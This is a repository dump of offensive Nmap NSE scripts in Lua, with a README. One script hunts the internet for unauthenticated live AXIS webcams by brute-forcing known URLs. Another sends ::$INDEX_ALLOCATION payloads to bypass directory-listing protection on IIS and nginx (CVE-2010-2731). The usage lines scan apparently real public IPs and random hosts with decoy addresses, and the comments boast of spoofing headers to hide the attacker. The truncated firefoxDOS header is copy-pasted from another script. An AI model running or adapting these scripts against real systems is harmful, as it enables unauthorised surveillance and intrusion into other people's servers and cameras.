├── AXISwebcam-recon.nse ├── IIS-CVE-2010-2731.nse ├── README.md ├── Under Develop ├── firefoxDOS.nse ├── joomla-3_4_5.nse └── suid-shell.nse ├── abb-cve-2019-7226.nse ├── cisco-cve-2019-1937.nse ├── dlink-cve-2019-13101.nse ├── file-checker.nse ├── ms15-034.nse ├── phpipam.nse └── xeoon-itachitux.png /AXISwebcam-recon.nse: -------------------------------------------------------------------------------- 1 | --- 2 | -- Nmap NSE AXISwebcam-recon.nse - Version 1.10 3 | -- Copy to: /usr/share/nmap/scripts/AXISwebcam-recon.nse 4 | -- Update NSE database: sudo nmap --script-updatedb 5 | -- execute: nmap --script-help AXISwebcam-recon.nse 6 | -- Port(s) accepted: 80-86,92,8001,8080-8086,50090,55752-55758 7 | --- 8 | 9 | -- SCRIPT BANNER DESCRIPTION -- 10 | description = [[ 11 | 12 | Module Author: r00t-3xp10it & Cleiton Pinheiro 13 | NSE script to detect if target [ip]:[port][/url] its an AXIS Network Camera transmiting (live). 14 | This script also allow is users to send a fake User-Agent in the tcp packet 15 | and also allow is users to input a diferent uri= [/url] link to be scan, IF none uri= value its inputed, then 16 | this script tests a List of AXIS default [/url's] available in our database to brute force the HTML TITLE tag. 17 | 'Remark: This nse script will NOT execute againts webcams found that require authentication logins' 18 | 19 | Some Syntax examples: 20 | nmap --script-help AXISwebcam-recon.nse 21 | nmap -sV -Pn -p 80-86,92,8001,8080-8086,50090,55752-55754 --open --script AXISwebcam-recon.nse 216.99.115.136 22 | nmap -sV -Pn -p 80-86,92,8080-8086 --open --script AXISwebcam-recon.nse --script-args "uri=/view/viewer_index.shtml" 217.78.137.43 23 | nmap -sS -Pn -p 80-86,92,8080-8086 --script AXISwebcam-recon.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 50.93.227.204 24 | nmap -sS -Pn -p 80,8080-8086 --open --script AXISwebcam-recon.nse --script-args "agent=Mozilla/5.0 (compatible),uri=/fd" 194.150.15.187 25 | nmap -sS -v -Pn -n -T5 -iR 700 -p 80-86,92,8001,8080-8086,55752-55758 --open --script=http-headers.nse,AXISwebcam-recon.nse -D 65.49.82.3 26 | 27 | ]] 28 | 29 | 30 | --- 31 | -- @usage 32 | -- nmap --script-help AXISwebcam-recon.nse 33 | -- nmap -sV -Pn -p 80-86,92,8080-8082 --open --script AXISwebcam-recon.nse 216.99.115.136 34 | -- nmap -sV -Pn -p 80-86,92,8080-8082 --open --script AXISwebcam-recon.nse --script-args "uri=/view/viewer_index.shtml" 217.78.137.43 35 | -- nmap -sS -Pn -p 80-86,92,8080-8082 --script AXISwebcam-recon.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 50.93.227.204 36 | -- nmap -sS -Pn -p 80-86,92,8080-8082 --open --script AXISwebcam-recon.nse --script-args "agent=Mozilla/5.0 (compatible),uri=/" 194.150.15.187 37 | -- @output 38 | -- PORT STATE SERVICE VERSION 39 | -- 8080/tcp open http Boa httpd 40 | -- | AXISwebcam-recon: 41 | -- | STATUS: AXIS WEBCAM FOUND 42 | -- | TITLE: Live view - AXIS 211 Network Camera version 4.11 43 | -- | WEBCAM ACCESS: http://216.99.115.136:8080/view/index.shtml 44 | -- | Module Author: r00t-3xp10it & Cleiton Pinheiro 45 | -- |_ 46 | -- @args payload.uri the path name to search. Default: /view/index.shtml 47 | -- @args payload.agent User-agent to send in request - Default: iPhone,safari 48 | --- 49 | 50 | 51 | author = "r00t-3xp10it & Cleiton Pinheiro" 52 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 53 | categories = {"safe", "discovery"} 54 | 55 | 56 | -- DEPENDENCIES (lua nse libraries) -- 57 | local stdnse = require ('stdnse') --> nse args usage 58 | local shortport = require "shortport" 59 | local string = require "string" 60 | local http = require "http" 61 | local os = require "os" --> required for (sleep) 62 | -- define loop limmit(s) 63 | f = 0 64 | limmit = 0 65 | 66 | 67 | -- SET VALUES COLOR TERMINAL USE IN FUNCTION -- 68 | local colors = { 69 | -- attributes 70 | reset = 0, 71 | clear = 0, 72 | bright = 1, 73 | dim = 2, 74 | underscore = 4, 75 | blink = 5, 76 | reverse = 7, 77 | hidden = 8, 78 | 79 | -- foreground 80 | black = 30, 81 | red = 31, 82 | green = 32, 83 | yellow = 33, 84 | blue = 34, 85 | magenta = 35, 86 | cyan = 36, 87 | white = 37, 88 | 89 | -- background 90 | onblack = 40, 91 | onred = 41, 92 | ongreen = 42, 93 | onyellow = 43, 94 | onblue = 44, 95 | onmagenta = 45, 96 | oncyan = 46, 97 | onwhite = 47, 98 | } 99 | 100 | -- FUNCTION SET COLOR TERMINAL -- 101 | local function makecolor(value) 102 | value = string.char(27) .. '[1;' .. tostring(value) .. 'm' 103 | return value 104 | end 105 | 106 | -- SET VALUES COLOR TERMINAL -- 107 | local green_color = makecolor(colors.green) 108 | local white_color = makecolor(colors.white) 109 | local error_color = makecolor(colors.red) 110 | local reset_color = makecolor(colors.reset) 111 | local yellow_color = makecolor(colors.yellow) 112 | 113 | -- COLORING MADE BY MODULE -- 114 | local by_module = white_color.."r00t-3xp10it & Cleiton Pinheiro"..reset_color 115 | 116 | 117 | -- THE RULE SECTION -- 118 | -- portrule = shortport.http --> Scan only the selected ports/proto/service_name in open state 119 | portrule = shortport.port_or_service({80, 81, 82, 83, 84, 85, 86, 92, 8001, 8080, 8081, 8082, 8083, 50090, 55752, 55754}, "http, http-proxy", "tcp", "open") 120 | 121 | 122 | -- THE ACTION SECTION -- 123 | action = function(host, port) 124 | print(yellow_color.."Brute forcing Network Camera URL (uri)"..reset_color) 125 | os.execute("sleep 0.5") 126 | -- Define User Input uri variable 127 | uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/indexFrame.shtml" 128 | 129 | -- Check User Input uri response 130 | local check_uri = http.get(host, port, uri) 131 | if ( check_uri.status == 401 ) then 132 | print("|["..error_color..check_uri.status..reset_color.."] => http://"..host.ip..":"..port.number..uri..error_color.." (AUTH LOGIN FOUND)"..reset_color) 133 | elseif ( check_uri.status == 404 ) then 134 | print("|["..error_color..check_uri.status..reset_color.."] "..host.ip.." => "..uri) 135 | -- None User Input uri found => using table {uril} List 136 | uril = {"/webcam.html", "/1/webcam.html", "/cam/Gcam.html", "/sub06/cam.php", "/home/homeS.html", "/webcam_code.php", "/view/view.shtml", "/indexFrame.shtml", "/view/index.shtml", "/view/index2.shtml", "/webcam/view.shtml", "/ViewerFrame.shtml", "/RecordFrame?Mode=", "/stadscam/Live95j.asp", "/livecamera/homeJ.html", "/MultiCameraFrame?Mode=", "/view/viewer_index.shtml", "/m/MultiCameraFrame?Mode=", "/visitor_center/i-cam.html", "/CgiStart?page=Single&Mode=", "/img/main.cgi?next_file=main.htm", "index.shtml"} 137 | -- loop Through {table} of uri url's 138 | for i, intable in pairs(uril) do 139 | local res = http.get(host, port, intable) 140 | if ( res.status == 200 ) then 141 | print("|["..green_color..res.status..reset_color.."] "..host.ip.." => "..intable) 142 | uri = intable --> define uri variable now 143 | break --> break execution (loop) if a match string its found (uri). 144 | else 145 | limmit = limmit+1 --> count how many interactions (loops done) 146 | print("|["..error_color..res.status..reset_color.."] "..host.ip.." => "..intable) 147 | os.execute("sleep 0.5") 148 | if ( limmit == 22 ) then --> why 22? Because its the number of URI links present in the {table} list. 149 | print("|[ABORT]: "..error_color.."None Match (uri) has been found in AXISwebcam-recon database."..reset_color) 150 | print("|[NOTES]: "..yellow_color.."--script-args uri=/CgiStart?page=Single&Mode=Motion&Language=1"..reset_color) 151 | print("|_") 152 | os.execute("sleep 1") 153 | return --> --> exit() if none match its found in our database 154 | end 155 | end 156 | end 157 | -- Diferent error codes (mosquito needs this seting) 158 | elseif ( check_uri.status == 400 or check_uri.status == 403 or check_uri.status == 405 or check_uri.status == 500 or check_uri.status == 502 or check_uri.status == 503 or check_uri.status == 307 or check_uri.status == 302 or check_uri.status == 301 or check_uri.status == nil ) then 159 | print("|["..error_color..check_uri.status..reset_color.."] "..host.ip.." => "..uri) 160 | do return end --> exit if any of this error codes returns 161 | else 162 | print("|["..green_color..check_uri.status..reset_color.."] "..host.ip.." => "..uri) 163 | end 164 | print(" _") 165 | 166 | 167 | -- Manipulate TCP packet 'header' with false information about attacker :D 168 | local options = {header={}} --> manipulate 'header' request .. 169 | options['header']['User-Agent'] = stdnse.get_script_args(SCRIPT_NAME..".agent") or "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25" --> use iPhone,safari User-agent OR your own... 170 | options['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" --> use en-GB as attacker default install language 171 | options['header']['Cache-Control'] = "no-store" --> Instruct webserver to not write it to disk (do not to cache it) 172 | 173 | 174 | -- Read response from target (http.get) 175 | local response = http.get(host, port, uri, options) 176 | -- Check if host addr respondes successfull [200] 177 | if ( response.status == 200 ) then 178 | local title = string.match(response.body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>([^<]*)") 179 | print("| "..yellow_color.."AXISwebcam-recon"..reset_color..":") 180 | -- List {table} of HTTP TITLE tags 181 | tbl = {"TL-WR740N", 182 | "SNC-RZ30 HOME", 183 | "AXIS Video Server", 184 | "Live View / - AXIS", 185 | "Express6 Live Image", 186 | "ExpressXL Live Image", 187 | "Network Camera Lobby", 188 | "AXIS 2400 Video Server", 189 | "Network Camera TUCCAM1", 190 | "AXIS 243Q(2) Blade 4.45", 191 | "Network Camera Capitanía", 192 | "AXIS P5514 Network Camera", 193 | "AXIS Q1615 Network Camera", 194 | "AXIS P1357 Network Camera", 195 | "AXIS M5013 Network Camera", 196 | "AXIS M3026 Network Camera", 197 | "AXIS M1124 Network Camera", 198 | "Network Camera HVM-WebCam", 199 | "Network Camera Hwy285/cr43", 200 | "Login - Residential Gateway", 201 | "Axis 2420 Video Server 2.32", 202 | "AXIS Q6045-E Network Camera", 203 | "AXIS Q6044-E Network Camera", 204 | "Network Camera NetworkCamera", 205 | "AXIS P1435-LE Network Camera", 206 | "AXIS P1425-LE Network Camera", 207 | "Axis 2120 Network Camera 2.34", 208 | "Axis 2420 Network Camera 2.30", 209 | "Axis 2420 Network Camera 2.31", 210 | "Axis 2420 Network Camera 2.32", 211 | "Network Camera NetworkCamera1", 212 | "AXIS P1365 Mk II Network Camera", 213 | "AXIS F34 Network Camera 6.50.2.3", 214 | "AXIS 214 PTZ Network Camera 4.49", 215 | "Axis 2130 PTZ Network Camera 2.30", 216 | "Axis 2130 PTZ Network Camera 2.31", 217 | "Axis 2130 PTZ Network Camera 2.32", 218 | "AXIS P5635-E Mk II Network Camera", 219 | "AXIS Q7401 Video Encoder 5.51.5.1", 220 | "AXIS Q6045-E Mk II Network Camera", 221 | "AXIS P1353 Network Camera 6.50.2.3", 222 | "AXIS M3004 Network Camera 5.51.5.1", 223 | "AXIS M1145-L Network Camera 6.50.3", 224 | "AXIS M2025-LE Network Camera 8.50.1", 225 | "Live view / - AXIS 205 version 4.03", 226 | "Live view - AXIS 240Q Video Server", 227 | "Live view - AXIS 221 Network Camera", 228 | "Live view - AXIS 211 Network Camera", 229 | "AXIS Q1765-LE Network Camera 5.55.2.3", 230 | "Live view - AXIS P1354 Network Camera", 231 | "Live view - AXIS P1344 Network Camera", 232 | "Live view - AXIS M1114 Network Camera", 233 | "Live view - AXIS M1103 Network Camera", 234 | "Live view - AXIS M1025 Network Camera", 235 | "AXIS P1354 Fixed Network Camera 6.50.3", 236 | "AXIS P1354 Fixed Network Camera 5.60.1", 237 | "AXIS V5914 PTZ Network Camera 5.75.1.11", 238 | "Live view - AXIS P5534-E Network Camera", 239 | "Live view - AXIS 215 PTZ Network Camera", 240 | "Live view - AXIS 214 PTZ Network Camera", 241 | "Live view - AXIS 213 PTZ Network Camera", 242 | "AXIS P5534 PTZ Dome Network Camera 5.51.5", 243 | "AXIS Q6034-E PTZ Dome Network Camera 5.41.4", 244 | "AXIS P3354 Fixed Dome Network Camera 5.40.17", 245 | "AXIS Q6042-E PTZ Dome Network Camera 5.70.1.4", 246 | "AXIS Q3505 Fixed Dome Network Camera 6.30.1.1", 247 | "Live view - AXIS 206M Network Camera version 4.11", 248 | "Live view - AXIS 211 Network Camera version 4.11", 249 | "Live view - AXIS 211 Network Camera version 4.10", 250 | "Live view / - AXIS 205 Network Camera version 4.04", 251 | "Live view / - AXIS 205 Network Camera version 4.05", 252 | "AXIS P5635-E Mk II PTZ Dome Network Camera 8.40.2.2", 253 | "Live view / - AXIS 205 Network Camera version 4.05.1", 254 | "Live view - AXIS 213 PTZ Network Camera version 4.12"} 255 | 256 | -- Loop Through {table} of HTTP TITLE tags 257 | for i, intable in pairs(tbl) do 258 | local validar = string.match(title, intable) 259 | if ( validar ~= nil or title == intable ) then 260 | print("|\n| STATUS: "..green_color.."AXIS WEBCAM FOUND"..reset_color.."\n| TITLE: "..green_color..intable..reset_color.."\n| WEBCAM ACCESS: "..green_color.."http://"..host.ip..":"..port.number..uri..reset_color.."\n| Module Author: "..by_module.."\n|_") 261 | break --> break execution (loop) if a match string its found. 262 | else 263 | print("| TESTING: "..intable) 264 | os.execute("sleep 0.5") 265 | f = f+1 --> count how many interactions (loops done) 266 | if (f == 74) then --> why 74? Because its the number of TITLE tags present in the {table} list. 267 | print("|_") 268 | return "\n STATUS: NONE AXIS WEBCAM FOUND\n Module Author: r00t-3xp10it & Cleiton Pinheiro\n\n" 269 | end 270 | end 271 | end 272 | end 273 | end 274 | -------------------------------------------------------------------------------- /IIS-CVE-2010-2731.nse: -------------------------------------------------------------------------------- 1 | --- 2 | -- Nmap NSE IIS-CVE-2010-2731.nse - Version 1.8 3 | -- Copy to: /usr/share/nmap/scripts/IIS-CVE-2010-2731.nse 4 | -- Update NSE database: sudo nmap --script-updatedb 5 | -- execute: nmap --script-help IIS-CVE-2010-2731.nse 6 | -- Port(s) accepted by this nse: 80-86,8001,8080-8086 7 | --- 8 | 9 | -- SCRIPT BANNER DESCRIPTION -- 10 | description = [[ 11 | 12 | Module Author: r00t-3xp10it 13 | NSE script to detect if target [ip]:[port][/url] its affected by CVE-2010-2731 (Directory Listing Denied) 14 | This module bypasses Directory Listing protections for Internet Information Services (microsoft-IIS/5.1 to 7.5 15 | & nginx 0.7.52 to 1.3.0). By appending a payload to the end of the directory name in a request, it is possible 16 | to access webserver protected directorys. nse arguments available: verbose=true (automatic display target body) 17 | agent=User-Agent (User-Agent string to send in probes) | uri=directory to scan (If none uri its inputed then this 18 | script tests a List of default [/url's] available in our database to brute force folder names). This nse script 19 | will auto-execute if the categorie it belongs its called (eg. --script=vuln) <-- run all vuln categorie scripts. 20 | 21 | Some Syntax examples: 22 | nmap --script-help IIS-CVE-2010-2731.nse 23 | nmap -sV -v -Pn -n -p 80-86,8001,8080-8086 --open --script=vuln 103.59.101.83 24 | nmap -sV -Pn -n -p 80-86,8001,8080-8086 --open --script IIS-CVE-2010-2731.nse 223.7.230.27 25 | nmap -sV -Pn -n -p 80-86,8001,8080-8086 --open --script IIS-CVE-2010-2731.nse --script-args "uri=/css" 223.7.230.27 26 | nmap -sS -Pn -p 80 --open --script IIS-CVE-2010-2731.nse --script-args "agent=Apache-HttpClient/4.0.3,verbose=true" 80.32.135.112 27 | nmap -sS -v -Pn -n -T4 -iR 700 -p 80,8001,8080-8086 --open --script=banner.nse,http-headers.nse,IIS-CVE-2010-2731.nse -D 65.49.82.3 28 | 29 | ]] 30 | 31 | --- 32 | -- @usage 33 | -- nmap --script-help IIS-CVE-2010-2731.nse 34 | -- nmap -sV -Pn -n -p 80-86,8001,8080-8086 --open --script IIS-CVE-2010-2731.nse 223.7.230.27 35 | -- nmap -sV -Pn -n -p 80-86,8001,8080-8086 --open --script IIS-CVE-2010-2731.nse --script-args "uri=/css" 223.7.230.27 36 | -- nmap -sS -Pn -p 80 --open --script IIS-CVE-2010-2731.nse --script-args "agent=Apache-HttpClient/4.0.3,verbose=true" 223.7.230.27 37 | -- nmap -sS -v -Pn -n -T5 -iR 700 -O -p 80,8001,8080-8086 --open --script=banner.nse,http-headers.nse,IIS-CVE-2010-2731.nse -D 65.49.82.3 38 | -- @output 39 | -- PORT STATE SERVICE VERSION 40 | -- 80/tcp open http 41 | -- | IIS-CVE-2010-2731: 42 | -- | STATUS: POSSIBLE BYPASS - Directory Listing Denied 43 | -- | URL ACCESS: http://223.7.230.27:80/images::$INDEX_ALLOCATION/ 44 | -- | Module Author: r00t-3xp10it (ssa redteam) 45 | -- |_ 46 | -- @args payload.uri the path name to search. Default: /0/ 47 | -- @args payload.agent User-agent to send in request - Default: iPhone,safari 48 | -- @args payload.verbose Automatic display target webpage body - Default: false 49 | --- 50 | 51 | 52 | author = "r00t-3xp10it (ssa redteam)" 53 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 54 | categories = {"safe", "vuln"} 55 | 56 | 57 | -- DEPENDENCIES (lua nse libraries) -- 58 | local stdnse = require ('stdnse') --> nse args usage 59 | local shortport = require "shortport" 60 | local string = require "string" 61 | local table = require "table" 62 | local http = require "http" 63 | local nmap = require "nmap" 64 | local os = require "os" --> required for (sleep) 65 | -- define loop limmit(s) 66 | limmit = 0 67 | 68 | 69 | -- SET VALUES COLOR TERMINAL USE IN FUNCTION -- 70 | local colors = { 71 | -- attributes 72 | reset = 0, 73 | clear = 0, 74 | bright = 1, 75 | dim = 2, 76 | underscore = 4, 77 | blink = 5, 78 | reverse = 7, 79 | hidden = 8, 80 | 81 | -- foreground 82 | black = 30, 83 | red = 31, 84 | green = 32, 85 | yellow = 33, 86 | blue = 34, 87 | magenta = 35, 88 | cyan = 36, 89 | white = 37, 90 | 91 | -- background 92 | onblack = 40, 93 | onred = 41, 94 | ongreen = 42, 95 | onyellow = 43, 96 | onblue = 44, 97 | onmagenta = 45, 98 | oncyan = 46, 99 | onwhite = 47, 100 | } 101 | 102 | -- FUNCTION SET COLOR TERMINAL -- 103 | local function makecolor(value) 104 | value = string.char(27) .. '[1;' .. tostring(value) .. 'm' 105 | return value 106 | end 107 | -- SET VALUES COLOR TERMINAL -- 108 | local green_color = makecolor(colors.green) 109 | local white_color = makecolor(colors.white) 110 | local error_color = makecolor(colors.red) 111 | local reset_color = makecolor(colors.reset) 112 | local yellow_color = makecolor(colors.yellow) 113 | -- COLORING MADE BY MODULE -- 114 | local by_module = white_color.."r00t-3xp10it (ssa redteam)"..reset_color 115 | 116 | 117 | -- THE RULE SECTION -- 118 | -- portrule = shortport.http --> Scan only the selected ports/proto/service_name in open state 119 | portrule = shortport.port_or_service({80, 81, 82, 83, 84, 85, 86, 8001, 8080, 8081, 8082, 8083, 8084, 8085, 8086}, "http, http-proxy", "tcp", "open") 120 | 121 | 122 | -- THE ACTION SECTION -- 123 | action = function(host, port) 124 | print(yellow_color.."IIS-CVE-2010-2731:"..reset_color) 125 | print("| "..yellow_color.."Checking exploit compatibility."..reset_color) 126 | 127 | 128 | local result 129 | uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/0/" 130 | disp = stdnse.get_script_args(SCRIPT_NAME..".verbose") or "false" 131 | -- bias = stdnse.get_script_args(SCRIPT_NAME..".vuln") or "Server: Microsoft-IIS/6.0" 132 | -- Table of server vulnerable versions 133 | tbl = {"Server: nginx/0.7.52", "Server: nginx/1.0.0", "Server: nginx/1.1.0", "Server: nginx/1.2.0", "Server: nginx/1.3.0", "Server: Microsoft-IIS/5.1", "Server: Microsoft-IIS/6.0", "Server: Microsoft-IIS/6.1", "Server: Microsoft-IIS/6.2", "Server: Microsoft-IIS/6.3", "Server: Microsoft-IIS/6.4", "Server: Microsoft-IIS/6.5", "Server: Microsoft-IIS/6.6", "Server: Microsoft-IIS/6.7", "Server: Microsoft-IIS/6.8", "Server: Microsoft-IIS/6.9", "Server: Microsoft-IIS/7.0", "Server: Microsoft-IIS/7.1", "Server: Microsoft-IIS/7.2", "Server: Microsoft-IIS/7.3", "Server: Microsoft-IIS/7.4", "Server: Microsoft-IIS/7.5", "Server: Apache/2.4.6 (CentOS) PHP/7.1.32"} 134 | 135 | -- Capture target header to compare againts {tbl} vuln versions 136 | result = http.get(host, port, "/") 137 | -- Display target header if verbose=true 138 | if ( disp == "true" ) then 139 | print("") 140 | for _, stdout_header in pairs(result.rawheader) do 141 | print(stdout_header) 142 | end 143 | end 144 | 145 | target = "false" 146 | -- loop trougth {tbl} (vuln server versions) 147 | for i, intable in pairs(tbl) do 148 | -- loop trougth result.rawheader {table} (captured header) 149 | for _, server_version in pairs(result.rawheader) do 150 | if (server_version == intable) then 151 | target = server_version --> we have found a match between {tbl} and captured header {server_version=compatible} 152 | break 153 | end 154 | end 155 | end 156 | 157 | -- Exit if none compatible server version its found 158 | if (target == "false") then 159 | print("| ["..error_color.."404"..reset_color.."] Non Compatible Server version detected.") 160 | print("|\n| STATUS: "..error_color..host.ip.." - Does not seems vuln to CVE-2010-2731"..reset_color.."\n| Module Author: "..by_module.."\n|_") 161 | do return end 162 | else 163 | print("| ["..green_color.."200"..reset_color.."] "..target) 164 | end 165 | 166 | 167 | -- Manipulate TCP packet 'header' with false information about attacker :D 168 | local options = {header={}} --> manipulate 'header' request .. 169 | options['header']['User-Agent'] = stdnse.get_script_args(SCRIPT_NAME..".agent") or "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1" --> use iPhone,safari User-agent OR your own... 170 | options['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" --> use en-GB as attacker default install language 171 | options['header']['Cache-Control'] = "no-store" --> Instruct webserver to not write it to disk (do not to cache it) 172 | 173 | 174 | -- Scanning for directory names in target host 175 | local check_uri = http.get(host, port, uri, options) 176 | if (check_uri.status == 1003 or check_uri.body:match("Direct IP access not allowed")) then 177 | print("| ["..error_color..check_uri.status..reset_color.."] => http://"..host.ip..":"..port.number..error_color.." (Direct IP access not allowed)"..reset_color.."\n|_") 178 | elseif (check_uri.body and check_uri.status == 404) then 179 | print("| "..yellow_color.."Scanning Directory Names."..reset_color) 180 | print("| ["..error_color..check_uri.status..reset_color.."] "..host.ip.." => "..uri) 181 | -- None User Input uri found => using table {uril} List 182 | uril = {"/etc/", "/Mem/", "/img/", "/css/", "/ASP/", "/imgs/", "/.svn/", "/main/", "/home/", "/Data/", "/USER/", "/Mail/", "/News/", "/Site/", "/Page/", "/fotos/", "/forum/", "/Excel/", "/login/", "/admin/", "/Views/", "/stats/", "/Pages/", "/Album/", "/static/", "/hidden/", "/camera/", "/Albums/", "/admin1/", "/Survey/", "/Office/", "/PSUser/", "/Citrix/", "/Common/", "/images/", "/gallery/", "/account/", "/Sources/", "/Example/", "/History/", "/archive/", "/database/", "/archives/", "/Plug-Ins/", "/AdminWeb/", "/documents/", "/UserFiles/", "/adminRoot/", "/ISSamples/", "/FCKeditor/", "/Templates/", "/adminuser/", "/adsamples/", "/Web_Store/", "/admin-serv/", "/CreditCard/", "/adminmysql/", "/Statistics/", "/ProductCart/", "/addressbook/", "/addressBook/", "/AdvWebAdmin/", "/DomainFiles/", "/HBTemplates/", "/administator/", "/Administration/", "/CustomerService/", "/adminphpmyadmin/"} 183 | -- loop Through {table} of uri url's 184 | for i, intable in pairs(uril) do 185 | local res = http.get(host, port, intable) 186 | if (res.status == 403 or res.status == 401 and res.body:match("Directory Listing Denied")) then 187 | print("| ["..green_color..res.status..reset_color.."] "..host.ip.." => "..intable..green_color.." (found: protected)"..reset_color) 188 | limmit = limmit+1 --> count how many interactions (loops done) 189 | os.execute("sleep 0.2") 190 | -- Sellect payload to use based on target uri 191 | local parse = string.sub(intable, -1) --> grab last char of uri 192 | if (parse ~= "/") then 193 | payload = ":$i30:$INDEX_ALLOCATION/" 194 | uri = intable..payload --> define uri variable with payload now 195 | else 196 | conf = intable:sub(1, -2) --> delete last [/] from uri 197 | payload = "::$INDEX_ALLOCATION/" 198 | uri = conf..payload --> define uri variable with payload now 199 | end 200 | if ( disp == "true" ) then 201 | print("\n"..res.body.."\n") 202 | end 203 | if ( limmit == 69 ) then 204 | print("|_") 205 | os.execute("sleep 1") 206 | return --> exit() on the end of uri list tests 207 | end 208 | else 209 | limmit = limmit+1 --> count how many interactions (loops done) 210 | print("| ["..error_color.."404"..reset_color.."] "..host.ip.." => "..intable) 211 | os.execute("sleep 0.2") 212 | if ( limmit == 69 ) then --> why 69? Because its the number of URI links present in the {table} list. 213 | print("|_") 214 | os.execute("sleep 1") 215 | return --> exit() on the end of uri list tests 216 | end 217 | end 218 | end 219 | -- More error codes 220 | elseif ( check_uri.status == 400 or check_uri.status == 405 or check_uri.status == 500 or check_uri.status == 502 or check_uri.status == 503 or check_uri.status == 307 or check_uri.status == 302 or check_uri.status == 301 or check_uri.status == nil ) then 221 | print("| ["..error_color..check_uri.status..reset_color.."] "..host.ip.." => "..uri) 222 | do return end --> exit if any of this error codes returns 223 | elseif ( check_uri.status == 403 and check_uri.body:match("Directory Listing Denied")) then 224 | print("| ["..green_color..check_uri.status..reset_color.."] "..host.ip.." => "..uri) 225 | -- Sellect payload to use based on target uri 226 | local parse = string.sub(uri, -1) --> grab last char of uri 227 | if (parse ~= "/") then 228 | payload = ":$i30:$INDEX_ALLOCATION/" 229 | uri = uri..payload 230 | else 231 | conf = uri:sub(1, -2) --> delete last [/] from uri 232 | payload = "::$INDEX_ALLOCATION/" 233 | uri = conf..payload 234 | end 235 | end 236 | 237 | 238 | -- Sending payload to sellected uri (last uri found) 239 | print("|\n| ["..green_color.."200"..reset_color.."] "..yellow_color.."Sending tcp packet with payload attached."..reset_color) 240 | os.execute("sleep 1") 241 | if ( uri == "/0/" ) then 242 | print("| STATUS: "..error_color.."None Match has been found in IIS-CVE-2010-2731 database."..reset_color.."\n| URL ACCESS:"..error_color.." http://"..host.ip..":"..port.number..reset_color.."\n| Module Author: "..by_module.."\n|_") 243 | else 244 | -- Trying to bypass directory protections 245 | local bypass = http.get(host, port, uri, options) 246 | if (bypass.status == 1003 or bypass.body:match("Direct IP access not allowed")) then 247 | print("| STATUS: "..error_color.."ERROR - Direct IP access not allowed"..reset_color.."\n| URL ACCESS:"..error_color.." http://"..host.ip..":"..port.number..uri..reset_color.."\n| Module Author: "..by_module.."\n|_") 248 | os.execute("sleep 2") 249 | if ( disp == "true" ) then 250 | print("\n"..bypass.body.."\n") 251 | end 252 | elseif (bypass.status == 501 or bypass.body:match("Not Implemented")) then 253 | print("| STATUS: "..error_color.."ERROR - Not Implemented"..reset_color.."\n| URL ACCESS:"..error_color.." http://"..host.ip..":"..port.number..uri..reset_color.."\n| Module Author: "..by_module.."\n|_") 254 | os.execute("sleep 2") 255 | if ( disp == "true" ) then 256 | print("\n"..bypass.body.."\n") 257 | end 258 | elseif (bypass.body and bypass.status == 404) then 259 | print("| STATUS: "..green_color.."POSSIBLE BYPASS - Directory Listing Denied"..reset_color.."\n| URL ACCESS:"..green_color.." http://"..host.ip..":"..port.number..uri..reset_color.."\n| Module Author: "..by_module.."\n|_") 260 | os.execute("sleep 2") 261 | if ( disp == "true" ) then 262 | print("\n"..bypass.body.."\n") 263 | end 264 | elseif (bypass.body and bypass.status == 200) then 265 | print("| STATUS: "..green_color.."FOUND BYPASS - Directory Listing Denied"..reset_color.."\n| URL ACCESS:"..green_color.." http://"..host.ip..":"..port.number..uri..reset_color.."\n| Module Author: "..by_module.."\n|_") 266 | os.execute("sleep 2") 267 | if ( disp == "true" ) then 268 | print("\n"..bypass.body.."\n") 269 | end 270 | elseif (bypass.status == 403 or bypass.body:match("Request denied by WatchGuard Firewall.") ) then 271 | print("| STATUS: "..error_color.."REQUEST DENIED - Directory Listing Denied ("..yellow_color.."WatchGuard"..error_color..")"..reset_color.."\n| URL ACCESS:"..error_color.." http://"..host.ip..":"..port.number..uri..reset_color.."\n| Module Author: "..by_module.."\n|_") 272 | os.execute("sleep 2") 273 | if ( disp == "true" ) then 274 | print("\n"..bypass.body.."\n") 275 | end 276 | else 277 | print("| STATUS: "..error_color..host.ip.." - Does not seem to by vuln to CVE-2010-2731"..reset_color.."\n| URL ACCESS:"..error_color.." http://"..host.ip..":"..port.number..uri..reset_color.."\n| Module Author: "..by_module.."\n|_") 278 | os.execute("sleep 2") 279 | if ( disp == "true" ) then 280 | print("\n"..bypass.body.."\n") 281 | end 282 | end 283 | end 284 | end 285 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # nmap-nse-modules 2 | my collection of nmap nse modules 3 | 4 | # Description 5 | this working directory contains diferent nmap nse modules 6 | writen by me to be of assistence in post-exploitation common tasks. 7 | 8 | # Install 9 | 1) Download module from github 10 | 2) edit module to read the description 11 | 3) port module to nmap nse database 12 | 4) update nse database: `nmap --script-updatedb` 13 | 14 | # Please read my 'WIKI' for further information. 15 | -------------------------------------------------------------------------------- /Under Develop/firefoxDOS.nse: -------------------------------------------------------------------------------- 1 | --- 2 | -- Nmap firefoxDOS - Version 1.6 3 | -- Copy script to: /usr/share/nmap/scripts/phpipam.nse 4 | -- Update NSE database: sudo nmap --script-updatedb 5 | -- executing: nmap --script-help phpipam.nse 6 | -- executing: nmap -sV -Pn -p 80 --open --script phpipam.nse 7 | -- executing: nmap -sV -Pn -p 80 --open --reason --script phpipam.nse --script-args uri=/phpipam.php 8 | -- executing: nmap -sV -Pn -p 80 --script phpipam.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 9 | --- 10 | 11 | 12 | -- SCRIPT BANNER DESCRIPTION -- 13 | description = [[ 14 | 15 | Module Author: r00t-3xp10it 16 | Vuln discover: Saeed reza 17 | NSE script to detect multiple vulnerabilitys in phpipam (1.2.1 & 1.1.010) versions 18 | of open-source web IP address management 